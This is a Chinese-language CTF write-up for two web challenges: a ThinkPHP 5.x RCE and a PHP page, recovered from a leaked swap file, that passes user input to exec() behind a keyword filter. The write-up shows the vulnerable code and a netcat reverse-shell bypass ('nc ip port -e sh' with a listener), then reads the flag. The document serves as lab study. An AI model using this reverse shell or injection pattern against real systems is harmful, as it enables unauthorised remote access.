oudhack:

打开后发现了power by:thinkphp
搜了一下发现5.x的通杀漏洞。 想用vulnhub复现一下来着,看到一半发现看不懂……

太菜。。
还是直接用:
微信截图_20200324034425.png

duangshell:

提示.swp泄露。 (找了半天的index.php.swp最后发现少了一个点)
.index.php.swp 脱下来之后 vim -r 还原:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>give me a girl</title>
</head>
<body>
    <center><h1>珍爱网</h1></center>
</body>
</html>
<?php
error_reporting(0);
echo "how can i give you source code? .swp?!"."<br>";
if (!isset($_POST['girl_friend'])) {
    die("where is P3rh4ps's girl friend ???");
} else {
    $girl = $_POST['girl_friend'];
    if (preg_match('/\>|\\\/', $girl)) {
        die('just girl');
    } else if (preg_match('/ls|phpinfo|cat|\%|\^|\~|base64|xxd|echo|\$/i', $girl)) {
        echo "<img src='img/p3_need_beautiful_gf.png'> <!-- He is p3 -->";
    } else {
        //duangShell~~~~
        exec($girl);
    }
}

exec么回显。system才会显示输出。
这里发现大佬的绕过打nc反弹:
nc ip port -e sh (他博客用的-c,应该是笔误??)

然后在内网开个机子监听:
nc -vvlp 1234

然后去打:
微信截图_20200324040154.png

然后我憨憨的去提交了。。发现不对。
最后用find找到flag位置:
find / -name flag

/etc/demo/P3rh4ps/love/you/flag
/flag

cat之

cat /etc/demo/P3rh4ps/love/you/flag
flag{564f7a7f-0a58-4071-991e-c05a0eb70df7}

wp中用curl+管道绕过,我也试了试:
微信截图_20200324041757.png
也是打成功了的。